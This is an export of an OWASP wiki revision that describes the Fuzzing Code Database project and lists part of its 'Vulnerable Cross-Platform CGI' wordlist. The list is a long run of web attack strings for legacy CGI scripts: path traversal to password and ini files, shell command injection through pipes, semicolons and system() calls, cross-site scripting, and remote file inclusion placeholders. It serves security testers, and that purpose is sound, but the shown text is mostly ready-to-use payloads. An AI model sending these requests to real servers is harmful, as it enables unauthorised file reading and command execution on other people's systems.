[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80095</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80095"/>
				<updated>2010-03-17T23:20:58Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
